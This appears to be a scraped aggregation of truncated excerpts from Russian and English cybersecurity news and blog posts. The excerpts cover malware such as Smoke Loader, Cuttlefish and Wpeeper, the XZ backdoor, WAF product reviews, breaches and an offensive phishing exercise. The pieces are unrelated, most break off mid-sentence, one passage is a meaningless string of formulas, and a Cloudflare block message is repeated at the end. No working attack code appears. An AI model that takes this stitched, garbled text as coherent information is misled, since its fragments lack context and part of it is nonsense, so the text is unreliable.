На Солнце взорвались две колоссальные солнечные вспышки, и Земля оказалась на линии огня (видео)Alexander AntipovНедавние вспышки на Солнце и их потенциальные последствия для Земли.

Корональные выбросы массы (КВМ), направленные на Землю, могут серьезно нарушить работу энергетических сетей, телекоммуникационных систем и орбитальных спутников, а также подвергнуть астронавтов опасным уровням радиации.

В результате мощных солнечных вспышек, как это произошло прошлой ночью, могут возникнуть радиопомехи в коротковолновом диапазоне, наблюдавшиеся в Австралии, Японии и Китае.

Мощные солнечные вспышки представляют серьезную угрозу для космических аппаратов, спутников и наземных технологий.

Чтобы мин…

Компании, создающей технологии распознавания лиц, не стоило урезать зарплату своим разработчикам…

Суд над Google подходит к концу: какой приговор ждет главного монополиста современности?

Адвокаты Министерства юстиции, генеральных прокуроров США и Google предоставили заключительные аргументы в затянувшемся деле против Google.

Правительство утверждает, что Google вела нечестную игру, выплачивая Apple и другим компаниям миллиарды долларов за установку своей поисковой системы по умолчанию на смартфонах и в браузерах.

Адвокаты допрашивали экспертов и руководителей, включая гендиректоров Google и Microsoft, Сундара Пичаи и Сатью Наделлу.

Он также опасается, что в будущем Google применит схожие методы для монополизации стремительно развивающейся индустрии искусственного интеллекта.

Хакеры бесплатно разворачивают свою С2-инфраструктуру на мощностях компании, не стесняясь использовать их в злонамеренных целях.

Как рентгеновские лучи раскрыли тайну загадочных колец.

Социальная инженерия выходит на первый план, а уязвимые политики DMARC лишь играют на руку киберпреступникам.

Лаборатория Касперского показала значительное развитие индустрии стилеров.

Google отчиталась о своих успехах и анонсировала пару интересных нововведений.

Ученые научились управлять атомами, приблизив нас к созданию идеальных квантовых устройств.

Полиция идентифицировала 39 подозреваемых, большую часть из которых удалось успешно арестовать.

ИБ-консультант решил поиграть в вымогателя, но правила игры сработали против него.

CISA и ФБР призывают к срочным мерам по защите кода.

Миллиардный обман госорганизаций завершился реальным тюремным сроком.

Компании реагируют на уязвимости после вмешательства специалистов.

Лишь обновление до безопасной версии убережёт ваши сетевые устройства от взлома.

Расскажем, чем привлекательны для киберпреступников PowerShell, Bash и JavaScript, в чём заключается секрет популярности C / C++ и как не стать жертвой вредоносных приложений на Python.

Отметим, что в эфире телепроекта AM Live недавно обсуждалось, как организовать процесс управления уязвимостями (Vulnerability Management) в 2024 году.

Какие языки программирования чаще всего используются для атакВажно принимать во внимание, что язык программирования — это всего лишь инструмент.

Python — один из наименее популярных языков среди создателей вредоносных программЕсть языки программирования, к которым в среде злоумышленников прибегают намного реже; к ним относится Python.

Использование СЗИ в совок…

Компании из всех отраслей ощущают на себе рост числа атак на свои веб-приложения.

Рассказываем о распределении атак на телеком-компании и интернет-площадки, зафиксированных среди пользователей платформы «Вебмониторэкс» в 2023 году, по типам, а также о способах защиты от них.

Анализ включал в себя оценку различных типов атак и рисков в целях определения общего уровня безопасности приложений.

Распространённые атаки на телекоммуникационные организацииАтака типа «RCE» направлена на использование уязвимостей для удалённого выполнения кода в веб-приложениях.

Проведение регулярных проверок паролей на слабость и на присутствие в базах утечек.

COPE (Company Owned, Personally Enabled) означает, что компания сама предоставляет сотруднику какое-то мобильное устройство, однако разрешает использовать его и для личных целей.

Разные подходы требуют различных политик для одних и тех же мобильных ОС и устройств.

В таких продуктах упор делался на использование гаджетов исключительно для корпоративных целей и на разграничение личных и рабочих данных пользователя.

Эти механизмы являются стандартными, поэтому если ваши разработчики или поставщики уже реализовали их для зарубежного UEM-вендора, чьим продуктом вы пользовались ранее, то для SafeMobile доработок не потребуется.

Подробная документация как для администратора и пользователя, так и д…

В феврале этого года на российском рынке ИБ появился новый сервис защиты веб-приложений МТС RED WAF.

Рассказываем о том, как этот сервис совместно с МТС RED Anti-DDoS защищает компании от комплекса атак на веб-ресурсы и в чём польза такого тандема.

В апреле на Anti-Malware.ru вышел актуальный обзор рынка защиты веб-приложений (WAF), где, помимо прочих, представлен сервис защиты веб-приложений МТС RED.

Как работает сервис защиты веб-приложений от взломаПосле того как компания принимает решение о подключении к сервису защиты веб-приложений, на DNS-серверах производится смена IP-адресов владельца защищаемых веб-ресурсов на IP-адреса сервис-провайдера защиты.

Это удобно, например, если компания…

Расскажем о проблемах реализации Purple Teaming как со стороны заказчика, так и со стороны исполнителя.

Проблемы защитниковВ первую очередь Purple Teaming нужен для команды защиты.

Лишь Purple Teaming позволит эффективно обнаружить слепые зоны, настоящие «чёрные дыры», закрома вашей сети.

Им требуется выполнять практически те же действия, что и на Red Teaming (либо — очень редко — что и при типовом пентесте).

В таком случае с экспертами, проводящими Purple Teaming, никто не взаимодействует, никто не просит помощи.

Процесс управления уязвимостямиЭтапы управления уязвимостямиЧто же такое управление уязвимостями (Vulnerability Management, VM) в России?

Модель управления уязвимостями не может быть достаточно полной без такого важного этапа, как полная подготовка инфраструктуры, отметила Анастасия Кузнецова.

Внедрение Vulnerability ManagementВедущий спросил спикеров о том, как оценить готовность организации ко внедрению полноценного процесса управления уязвимостями.

В течение трёх-пяти лет заказчики станут лучше понимать свои потребности в управлении уязвимостями и разбираться в доступных им решениях.

В течение трёх-пяти лет заказчики станут лучше понимать свои потребности в управлении уязвимостями и разб…

SAST — это набор технологий для анализа исходного кода и бинарных файлов на предмет таких условий кодирования и проектирования, которые указывают на уязвимости.

Комплексный анализ безопасности на примере Solar appScreenerРассмотрим комплексный подход к безопасной разработке ПО на примере решения Solar appScreener, разработанного ГК «Солар».

Решение Solar appScreener позволяет встраивать инструменты анализа кода в цикл безопасной разработки на разных его этапах.

Модуль SAST может быть использован на этапах разработки и тестирования в цикле SSDLC для своевременного выявления уязвимостей и НДВ.

Модуль DAST может быть использован на финальных стадиях разработки и на этапе тестирования ПО, когда…

Бурный рост российского рынка систем виртуализации серверных мощностей обусловлен уходом западных вендоров и ужесточением требований регуляторов.

Этот обзор затрагивает ПО и ПАК для виртуализации серверной инфраструктуры.

Тенденции на мировом рынке систем серверной виртуализацииСогласно обновлённому исследованию, объём мирового рынка ПО для виртуализации серверов в 2022 году составил 7 878 900 000 долларов США.

Динамика объёма российского рынка систем виртуализации, млн руб.

Качественная платформа серверной виртуализации должна отличаться стабильной работой и надёжностью, поддерживать базовые функции виртуализации и в то же время отвечать узкопрофильным сценариям.

Официальный анонс «Гарда WAF»Новый продукт «Гарда WAF»Группа компаний «Гарда» представила свой продукт «Гарда WAF», назвав его отражением «нового витка эволюции межсетевых экранов для защиты веб-приложений».

Варианты развёртывания облачных WAAP-решений (Gartner)Лука Сафонов, технический директор «Гарда WAF», прокомментировал это отличие следующим образом: «специально вариант облачной поддержки “Гарда WAF” пока не рассматривается».

Как уже было отмечено, группа компаний «Гарда» делает в настоящее время акцент на размещении своего решения в локальном формате, хотя принципиальных запретов на использование «Гарда WAF» в облаке нет.

Варианты наборов правил для контроля рисков («Гарда» / Weblock)…

Основная функция Smoke Loader — загрузка и запуск других вредоносных программ (троянов, шпионов, шифровальщиков) на устройстве жертвы.

Особенности кибератак с использованием Smoke Loader«Достоинствами» дроппера Smoke Loader являются малобюджетность и низкозатратность для организаторов кибератак.

Из самораспаковывающегося архива извлекается BAT-файл, а тот, в свою очередь, выполняет загрузку вредоносного дроппера Smoke Loader и после этого открывает PDF.

Всё это позволяет утверждать, что в данном случае мы, скорее всего, имеем дело с фейковой операцией.

ВыводыВредоносный дроппер Smoke Loader, который может загружать дополнительные модули или ПО, получая команды после подключения к C&C-сервер…

Процесс стратегического менеджмента, выстроенный в компанииОпределите зрелость процесса стратегического менеджмента, принятого в компании, и изучите применяемые практики.

Также на этом шаге нужно выяснить, как в компании определяется целевое состояние: через постановку целей, закрытие рисков и / или угроз либо по-другому.

Изучите прогнозы по ИБ на ближайшее время: как будет развиваться рынок ИБ, какие угрозы и виды атак станут популярными.

Изучите прогнозы по ИБ на ближайшее время: как будет развиваться рынок ИБ, какие угрозы и виды атак станут популярными.

Для успешной реализации стратегии ИБ нужно проанализировать динамику бюджета на ИБ и загрузку ИБ-специалистов, открытые вакансии и попы…

Схема интеграции Solar webProxy в корпоративную инфраструктуруВ Solar webProxy реализованы развитые механизмы для обеспечения его бесперебойной работы под большой нагрузкой.

Возможна синхронизация досье сотрудников из Solar webProxy и DLP-системы Solar Dozor.

Выгрузка событий в разделе «Статистика» Solar webProxyКак уже говорилось, в Solar webProxy реализован межсетевой экран.

Настройка NAT в Solar webProxyВ Solar webProxy можно настроить доступ без аутентификации, что актуально для ряда приложений.

Создание правила фильтрации запросов в Solar webProxyВ Solar webProxy реализован модуль разграничения прав на базе ролевой модели.

В рекламных постах он описывался как «зловещее творение ИИ на Python, представляющее тёмную силу, превосходящую как ChatGPT, так и WormGPT».

Как и в случае с xxXGPT, WolfGPT широко продвигался на хакерских форумах и в телеграм-каналах, но реальных подтверждений его возможностей, помимо единичных скриншотов интерфейса, найдено не было.

FraudGPT и DarkBERTFraudGPT и DarkBERT — ещё две «злые» разработки, которые кто-то продвигал в даркнете в июле 2023 года наряду с другими ИИ-сервисами для киберпреступников.

ChatGPT и его «злые конкуренты»: сравниваем ключевые параметрыХарактеристика ChatGPT «Злые» аналоги (xxXGPT, WolfGPT, FraudGPT, DarkBERT) Этические ограничения Есть Нет или минимальны Безо…

Сейчас, в условиях недоступности некоторых программных продуктов, рынок WAF в России активно меняется в пользу отечественных решений: появляются новые продукты, производители работают над конкурентными преимуществами.

На основе последних докладов компании Gartner о рынке межсетевых экранов уровня приложений, среди зарубежных продуктов стоит отметить следующие: Akamai Web Application Protector, Imperva WAF, Cloudflare WAF, F5 Big-IP WAF, Barracuda WAF и AWS WAF.

Обзор отечественного рынка WAFПродукты Web Application FirewallВ этом разделе рассмотрим «коробочные» продукты, как в программном исполнении, так и в программно-аппаратном.

«МегаФон WAF» предназначен для защиты веб-приложений от суще…

Apple ID Account Information.csv - внутри обнаруживаем информацию о всех формах Apple ID, которые вы когда либо заполняли, со всей необходимой конкретикой, например:Ваш Apple ID Number - DSPersonID, какой вы по счету у Apple, я, например 1341894157й, дата создания, тип платежной карты, адрес, телефоны, адреса доставки и так далее.

Интересно, какой purpose хранить данные о моем Apple ID в 2010 году?

(риторический вопрос)Двигаемся дальше - Apple ID Device Information.csvВ данном файле хранится информация об устройствах, которые привязаны сейчас и были привязаны когда либо к вашему Apple ID.

В App Install Activity.csv хранится информация об установленных вами приложениях, как из App Store, так…

Для тех кто не в лодке, в предыдущей части мы составили методологию и выбрали инструменты для проведения нестандартных фишинг-учений, чтобы проверить сотрудников нашей компании.

Для того чтобы преодолеть СЗИ и человеческий фактор, необходимо использовать:ресурсы и файлы-приманки из рабочей среды;короткие пэйлоады;обфусцированные значения и криптографические преобразования;низкие показатели идентификации вредоноса.

Отфильтруем и передадим результат на исполнение mshta.exe через оператор группировки (), который рекурсивно выполнит функции и вернет полученное значение.

Этап доставкиКогда мы уже сидим на чемоданах и все снасти упакованы, пора погрузиться на корабль и отправиться на долгожданную…

Наш гит репозиторий: https://github.com/lmsecure/Setezor/releasesЕсли в кратце, то это швейцарский нож, который позволяет проводить разведку сети, систематизировать информацию об оной, строить карту сети и удобно работать с большими объемами данных.

Поместить агента в сегмент сети и запустить сканирование.

Добавляются в ручную агенты на странице Settings с указанием IP адреса, выбирается цвет для расскарски на карте сети.

После, при загрузке логов со сканеров выбирается агент, приложение парсит логи и отображает на карте сети.

Запустим сканирование с другого агента, перед этим поменяв его над окном инструментовСписок доступных агентовЗапустив сканирование с трейс роутом на 1.1.1.1, а затем …

Важную роль с создании безопасных API играет компонент «Структура API» , обеспечивающий наблюдаемость схемы API.

Он позволяет выявлять проблемы, характерные для текущего состояния вашего API, и формулировать требования, которые будут переданы команде разработки для улучшения и безопасности API.

«Защита API» также помогает выявлять и блокировать запросы с признаками утечки конфиденциальных данных, работая вместе с компонентами «Обнаружение утечек API» и «Структура API».

«Тестирование API» : Новое решение, которое позволяет искать ошибки и уязвимости в API на основе OpenAPI спецификации.

Однако благодаря комплексному подходу и использованию современных инструментов, таких как «Структура API»,…

Продолжаем рубрику "Без про-v-ода", в основном мы разбираем для вас атаки на Wi-Fi, но в этой статье мы затронем одну из популярных беспроводных технологий - Bluetooth.

Конкретно этого рода атаки в этой статье мы рассматривать не будем, статья несёт больше ознакомительный характер с практическим применением на эксплуатацию более известных атак на устройства использующие Bluetooth.

Разумеется приоритет больше падёт на сторонний адаптер, нам поможет в этом инструмент для работы с Bluetooth hcitool, чтобы узнать идентификатор нашего адаптера.

Не удивляйтесь что в этом списке нет колонки, наушников и подобного на что вы и были изначально нацелены.

В результате, вы заметите, что время отклика в …

Есть уязвимости, защититься от которых можно на стороне фронта.

На самом деле зачастую это можно сделать либо на бэке, либо на фронте примерно с одинаковым результатом.

Однако штука эта популярная и на собеседованиях меня просили рассказать что-то именно на базе OWASP.

SameSite cookies (lax, strict) - настройка кук, с помощью которой мы можем лимитировать хосты, с которых и на которые эти куки могут отправляться.

Здесь по пунктам расписано, что можно сделать для защиты.

В продолжение нашего разговора про спам и его эффективность в качестве маркетингового инструмента, нельзя не затронуть актуальную тему SMS Firewall.

Функция SMS Firewall начала активно внедряться в смартфоны и сети операторов на уровне их сетевой инфраструктуры по всему миру.

По сравнению с антиспам-фильтрами на стороне устройств, SMS Firewall дает операторам некоторые важные преимущества в борьбе со спамом:Централизованный контроль на уровне сети.

Кроме того, SMS Firewall закрывает потенциальный канал для DDoS-атак на сеть оператора через подмену номера отправителя в SMS.

Да и в конечном счете, спам выгоден всем участникам цепочки — от создателей баз данных до производителей рекламируемых …

: Евклид в “Началах” доказывает бесконечность простых чисел и вводит понятие совершенных чисел, связанных с простыми числами Мерсенна.

1472 год: Впервые высказана Гольдбахова гипотеза, предполагающая, что каждое чётное число больше двух можно выразить суммой двух простых чисел.

1996 год: Начинается проект Великого Интернетного Поиска Простых Чисел Мерсенна (GIMPS), целью которого является поиск больших простых чисел Мерсенна с помощью распределённых вычислений.

(3)/3=1, 1/0.25/4=1…)i/ Lim x → x = 1 / Lim n→∞ = F 2,2 = X 5[1/1/1=1, 2/1/2=1, 3/1/3=1, 4/1/4=1…)i/ Lim x →∞ / Lim n→∞ = F 2,2 = X 6[1/1/1=1, 4/2/2=1, 9/3/3=1, 16/4/4=1…)Была выявлена вторая группа ненулевых конечных F значений по δ…

На прокси-сервере запускаем:Скрипт, сгенерированный инструментом Codegen; Парсер JSON-файла; Сервер nginx, настроенный как прокси на проверяемый веб-сервис с прокидыванием полученных заголовков.

Настройки аутентификации в обеих программах стандартны: токен, cookie, ключ в запросе, логин/пароль для HTTP Basic и автоматическая аутентификация по форме.

Профиль авторизации в сканере Solar appScreenerВдохновениеКонцепция решения проблемы авторизации заключается в установке прокси между DAST-инструментом и сканируемым сервисом.

Однако нам нужно создать способ “универсальной” авторизации, который будет работать и в тех случаях, где стандартные настройки доступа сканеров неприменимы.

В SPA-приложен…

Важной особенностью такого персонального расследования стало то, что Кашмир Хилл и ее муж, скорее всего, не давали согласия на сбор таких данных.

Или как минимум сделали это, не понимая в полной мере, что эта информация будет доступна кому-то еще, кроме автопроизводителя.

Они определяют и передают производителю данные о том, застегнут ли ремень, о случаях, когда водитель не удерживает авто в полосе и так далее.

И в том и в другом случае можно объяснить сбор телеметрии заботой о клиенте: это помогает усовершенствовать продукт.

Но торговля пользовательской информацией при этом является настолько прибыльным бизнесом, что вряд ли крупные производители автомобилей (равно как и разработчики обычн…

Я занимаюсь ИБ уже больше 10 лет, и в статье расскажу, как выстроить информационную безопасность в компании с нуля.

Пообщаться не только с вашим непосредственным руководителем, но и с другими менеджерами разных уровней, которые отвечают за разные подразделения организации.

Это поможет сформировать более целостную картину и не упустить что-то важное.

Это не значит, что при этом подходе не стоит учитывать мнение руководителей: просто опираться мы будем не на него, а на опыт индустрии.

Этот подход поможет и в том случае, если у менеджеров нет конкретных опасений, и они просто хотят, «чтобы было безопасно».

В прошлой статье мы поговорили тренды и эволюцию среди вредоносного ПО и программ-вымогателей.

В этот раз хотелось бы рассмотреть оставшийся спектр наиболее распространенных и интересных угроз последних лет.

В сравнении с этим распространение вредоносного ПО или программы-вымогателя требует гораздо более значительных усилий с точки зрения времени и планирования.

Используя этот груповой ботнет IoT-устройств, Mirai повредил сервисы, такие как Xbox Live и Spotify и веб-сайты, такие как BBC и Github и многие другие.

Они, как и мы, думают, как упростить свою работу, улучшить сервисы, сделать их более удобными, распространить как можно шире.

Я хотел бы попытаться закрыть пробелы в этой статье своими объяснениями и примерами кода на языке Rust.

Из данных мы формируем блоки, для SHA256 размер блока равен 64 байтам (512 бит), а для SHA512 128 байт (1024 бита).

В SHA256 K хранит 64 значения по 32 бита, а в SHA512 80 значений по 64 бита.

Этот код был проверен на нескольких примерах с ориентированием на вывод инструментов sha256sum и sha512sum из пакета coreutils версии 9.5.

Это можно сделать как в комментариях, так и в репозитории.

Ситуация неприятная как для пользователя, так и для интернет-провайдера — нужно поднимать базу IP-адресов и смотреть, где указана неактуальная геолокация.

Если не знали, что такое Geofeed и как с ним работать, добро пожаловать!

Подобные решения есть и у Selectel — аренда межсетевых экранов Решения класса Web Application Firewall — наилучший вариант для обеспечения безопасной публикации веб-приложений.

Выбрать подходящий можно на сайте Selectel Для ограничения пула IP-адресов, которым разрешен доступ к критическим ресурсам, можно использовать фильтрацию по GeoIP на основе списка стран с целевой аудиторией для подключения.

Для мониторинга информационной безопасности можно использовать open so…

В майском дайджесте расскажем про недобросовестную медицинскую компанию, как SaaS-поставщик случайно слил данные и про халатность крупнейшего производителя электроники Индии.

Как это произошло: 11 апреля агентство по кибербезопасности и защите инфраструктуры США (CISA) сообщило о взломе крупной американской компании Sisense.

По результатам предварительного расследования выяснилось, что в числе пострадавших оказались критически важные инфраструктурные организации США.

Регулятор рекомендовал клиентам Sisense заменить все учетные данные и токены доступа, связанные с инструментами и услугами компании.

ИБ-совет месяца: пускай кибератаки, утечки данных и штрафы остаются в наших дайджестах, а ваши…

Компания Google сообщила, что в 2023 году заблокировала 2,28 млн приложений в магазине Google Play.

Для сравнения: в 2022 году Google заблокировала почти 1,5 млн опасных приложений и приостановила активность 173 000 аккаунтов разработчиков за грубые нарушения.

Все эти усилия Google связаны с так называемыми принципами SAFE, которые в компании формулируют следующим образом: (S)afeguard Users, (A)dvocate for Developer Protection, (F)oster Responsible Innovation, (E)volve Platform Defenses.

Кроме того, Google сотрудничает с 31 поставщиком SDK, чтобы гарантировать, что с устройств, на которых установлены приложения, использующие эти SDK, будет собираться минимальное количество конфиденциальной …

Из Telegram не удалили более 120 000 противоправных материалов после требований Роскомнадзора (РКН), сообщают СМИ, со ссылкой на представителей ведомства.

За неудаление запрещенного контента предусмотрена административная ответственность, а в случае повторного нарушения суммы штрафов могут доходить до 20% годовой выручки компании.

Также в РКН отметили, что около 505 противоправных материалов не были удалены со стриминговой платформы Twitch, а с YouTube не удалено порядка 60 700 таких материалов.

По данным ведомства, в 2022 году сумма штрафов для Telegram Messenger Inc. составила 15 млн рублей, а в 2023 году — 8 млн рублей.

Компания Twitch Interactive Inc. также была оштрафована в 2022 году …

При этом сооб­щает­ся, что бэк­дор был внед­рен не в репози­торий XZ Utils, а в TAR-архи­вы.

Так, вре­донос­ный код серь­езно обфусци­рован, и его мож­но обна­ружить толь­ко в пол­ном пакете заг­рузки, а не в Git-дис­три­бути­ве, где отсутс­тву­ет мак­рос M4, запус­кающий про­цесс бил­да бэк­дора.

В октябре прош­лого года X уже начала взи­мать пла­ту в раз­мере дол­лара в год с новых невери­фици­рован­ных поль­зовате­лей в Новой Зелан­дии и на Филип­пинах.

Од­нако Фран­кофф сооб­щил изда­нию, что в мар­те обна­ружил еще одну ана­логич­ную кам­панию, в которой исполь­зовал­ся тот же LUA-заг­рузчик, SmartLoader, замас­кирован­ный под читер­ский софт Aimmy.

про­тив ), одна­ко объ­ем их вырос в…

Google начала тестировать новый квантово-устойчивый механизм инкапсуляции ключей TLS в августе прошлого года, а в последней версии Chrome активировала его для всех пользователей браузера.

«После нескольких месяцев экспериментов, связанных с совместимостью и производительностью, мы запускаем гибридный постквантовый обмен ключами TLS для десктопов в Chrome 124, — писали специалисты Chrome Security Team.

Однако после релиза Google Chrome 124 и Microsoft Edge 124 некоторые веб-приложения, брандмауэры и серверы разрывают соединения после TLS-хендшейка ClientHello.

Так, администраторам сайтов предлагается протестировать свои серверы, вручную активировав новую функцию в Google Chrome 124 с помощью…

Исследователи нашли новую малварь Cuttlefish, которая заражает SOHO-маршрутизаторы ради отслеживания проходящих через них данных и кражи аутентификационной информации.

Эксперты Black Lotus Labs компании Lumen Technologies рассказывают, что Cuttlefish предназначен для кражи данных, содержащихся в веб-запросах, которые проходят через маршрутизатор из соседней локальной сети.

Cuttlefish доступен в различных сборках с поддержкой ARM, i386, i386_i686, i386_x64, mips32 и mips64, то есть охватывает большинство архитектур маршрутизаторов.

Cuttlefish пассивно «слушает» пакеты в поисках «маркеров учетных данных» в трафике, например, имен пользователей, паролей и токенов, особенно связанных с публичны…

Компания Dropbox сообщила, что хакеры проникли в производственные системы платформы Dropbox Sign eSignature и получили доступ к токенам аутентификации, данным многофакторной аутентификации (МФА), хешированным паролям и информации о клиентах.

Dropbox Sign (ранее HelloSign) — это платформа электронной подписи, позволяющая клиентам хранить, отправлять и подписывать документы онлайн, причем подписями, имеющими юридическую силу.

24 апреля 2024 года специалисты Dropbox обнаружили несанкционированный доступ к производственным системам DropBox Sign и начали расследование.

Оказалось, злоумышленники каким-то образом получили доступ к автоматизированному инструменту для настройки системы Dropbox Sign,…

Разработчики Discord заблокировали множество аккаунтов, связанных с сервисом Spy Pet, который привлек внимание СМИ на прошлой неделе.

На прошлой неделе журналисты издания 404 Media опубликовали результаты расследования, посвященного сервису Spy Pet, который отслеживает и архивирует миллиарды сообщений на открытых серверах Discord.

Стоит отметить, что в Discord знали о существовании сервиса Spy Pet как минимум с февраля текущего года, и в компании не объяснили, почему меры стали приниматься только теперь, после появления информации о Spy Pet в СМИ.

В частности, пользователь под ником Spy Pet загрузил на Kiwi Farms несколько дампов с сообщениями, полученными из Spy Pet.

Когда разработчики Dis…

Threat actors have been increasingly weaponizing Microsoft Graph API for malicious purposes with the aim of evading detection.

This is done to "facilitate communications with command-and-control (C&C) infrastructure hosted on Microsoft cloud services," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News.

Since January 2022, multiple nation-state-aligned hacking groups have been observed using Microsoft Graph API for C&C.

The first known instance of Microsoft Graph API prior to its wider adoption dates back to June 2021 in connection with an activity cluster dubbed Harvester that was found using a custom implant known as Graphon that utilized the A…

LayerX has recently released a new guide, "Let There Be Light: Eliminating the Risk of Shadow SaaS" for security and IT teams, which addresses this gap.

The guide explains the challenges of shadow SaaS, i.e., the use of unauthorized SaaS apps for work purposes, and suggests practices and controls that can mitigate them.

According to LayerX, 65% of SaaS apps are not approved by IT and 80% of workers admit to using unapproved apps.

Shadow SaaS Mitigation GuidelinesTo address the risk of shadow SaaS, the guide introduces a three-pronged approach: App Discovery, User Monitoring, and Active Enforcement.

Here's how secure browser extensions work:Discovery of All SaaS Apps - The secure browser ext…

The U.S. government on Thursday published a new cybersecurity advisory warning of North Korean threat actors' attempts to send emails in a manner that makes them appear like they are from legitimate and trusted parties.

The joint bulletin was published by the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and the Department of State.

The technique specifically concerns exploiting improperly configured DNS Domain-based Message Authentication, Reporting, and Conformance (DMARC) record policies to conceal social engineering attempts.

In doing so, the threat actors can send spoofed emails as if they are from a legitimate domain's email server.

It is possible that TA4…

Google on Thursday announced that passkeys are being used by over 400 million Google accounts, authenticating users more than 1 billion times over the past two years.

In addition, the company said it's expanding Cross-Account Protection, which alerts of suspicious events with third-party apps and services connected to a user's Google Account, to include more apps and services.

Google added passkeys to Chrome in December 2022 and has since rolled out the passwordless authentication solution across Google Accounts on all platforms by default.

"Passkeys can act as a first- and second-factor, simultaneously," Google product managers Sriram Karra and Christiaan Brand said.

This replaces your rem…

HPE Aruba Networking (formerly Aruba Networks) has released security updates to address critical flaws impacting ArubaOS that could result in remote code execution (RCE) on affected systems.

Of the 10 security defects, four are rated critical in severity -CVE-2024-26304 (CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI ProtocolCVE-2024-26305 (CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI ProtocolCVE-2024-33511 (CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI ProtocolCVE-2024-33512 (CVSS …

Several popular Android applications available in Google Play Store are susceptible to a path traversal-affiliated vulnerability that could be exploited by a malicious app to overwrite arbitrary files in the vulnerable app's home directory.

Two of the apps that were found vulnerable to the problem are as follows -Xiaomi File Manager (com.mi.

Following responsible disclosure, both Xiaomi and WPS Office have rectified the issue as of February 2024.

Google has also published its own guidance on the matter, urging developers to properly handle the filename provided by the server application.

"If generating a unique filename is not practical, the client application should sanitize the provided f…

A Ukrainian national has been sentenced to more than 13 years in prison and ordered to pay $16 million in restitution for carrying out thousands of ransomware attacks and extorting victims.

Yaroslav Vasinskyi (aka Rabotnik), 24, along with his co-conspirators part of the REvil ransomware group orchestrated more than 2,500 ransomware attacks and demanded ransom payments in cryptocurrency totaling more than $700 million.

"The co-conspirators demanded ransom payments in cryptocurrency and used cryptocurrency exchangers and mixing services to hide their ill-gotten gains," the U.S. Department of Justice (DoJ) said.

"To drive their ransom demands higher, Sodinokibi/REvil co-conspirators also publ…

The benefits of using multiple scanning enginesGenerally speaking, vulnerability scanners aim to produce checks for as many vulnerabilities as possible.

So it's a harsh reality that one day you may find out that you've been compromised via an attack vector which your vulnerability scanner simply doesn't have a check for.

Most recently, Intruder has added Nuclei to its suite of vulnerability scanning engines, enhancing its ability to manage and secure attack surfaces.

Nuclei is an open-source vulnerability scanning engine, similar to OpenVAS, which is fast, extensible, and covers a wide range of weaknesses.

You can reduce your attack surface by continuously monitoring for changes with an aut…

Cloud storage services provider Dropbox on Wednesday disclosed that Dropbox Sign (formerly HelloSign) was breached by unidentified threat actors, who accessed emails, usernames, and general account settings associated with all users of the digital signature product.

Even worse, the intrusion also affects third-parties who received or signed a document through Dropbox Sign, but never created an account themselves, specifically exposing their names and email addresses.

The incident is also said to be restricted to Dropbox Sign infrastructure.

"Our security team also reset users' passwords, logged users out of any devices they had connected to Dropbox Sign, and is coordinating the rotation of …

A never-before-seen botnet called Goldoon has been observed targeting D-Link routers with a nearly decade-old critical security flaw with the goal of using the compromised devices for further attacks.

The vulnerability in question is CVE-2015-2051 (CVSS score: 9.8), which affects D-Link DIR-645 routers and allows remote attackers to execute arbitrary commands by means of specially crafted HTTP requests.

Telemetry data from the network security company points to a spike in the botnet activity around April 9, 2024.

"Cybercriminals rent out compromised routers to other criminals, and most likely also make them available to commercial residential proxy providers," cybersecurity company Trend Mi…

Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address.

"Similarly, tampering with repository code might involve inserting malware that compromises system integrity or introduces backdoors for unauthorized access.

Malicious code or abuse of the pipeline could lead to data theft, code disruption, unauthorized access, and supply chain attacks."

The flaw has been addressed in GitLab versions 16.5.6, 16.6.4, and 16.7.2, with the patches also backported to versions 16.1.6, 16.2.9, 16.3.7, and 16.4.5.

CISA has yet to provide any other details as to how the vulnerability is be…

"A secondary function gives it the capacity to perform both DNS and HTTP hijacking for connections to private IP space, associated with communications on an internal network."

It subsequently downloads and executes the Cuttlefish payload from a dedicated server depending on the router architecture (e.g., Arm, i386, i386_i686, i386_x64, mips32, and mips64).

"Cuttlefish represents the latest evolution in passive eavesdropping malware for edge networking equipment [...] as it combines multiple attributes," the cybersecurity firm said.

"It has the ability to perform route manipulation, hijack connections, and employs passive sniffing capability.

With the stolen key material, the actor not only …

A forensic analysis of a graph dataset containing transactions on the Bitcoin blockchain has revealed clusters associated with illicit activity and money laundering, including detecting criminal proceeds sent to a crypto exchange and previously unknown wallets belonging to a Russian darknet market.

"This is different to conventional crypto AML solutions, which rely on tracing funds from known illicit wallets, or pattern-matching with known money laundering practices."

Robinson said just considering the "shape" – the local structures within a complex network – of the money laundering subgraphs proved to be an already effective way to flag criminal activity.

Further examination of the subgrap…

Cybersecurity researchers have discovered a previously undocumented malware targeting Android devices that uses compromised WordPress sites as relays for its actual command-and-control (C2) servers for detection evasion.

The malware, codenamed Wpeeper, is an ELF binary that leverages the HTTPS protocol to secure its C2 communications.

Wpeeper relies on a multi-tier C2 architecture that uses infected WordPress sites as an intermediary to obscure its true C2 servers.

"These [hard-coded servers] are not C2s but C2 redirectors -- their role is to forward the bot's requests to the real C2, aimed at shielding the actual C2 from detection," the researchers said.

The commands retrieved from the C2 …

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

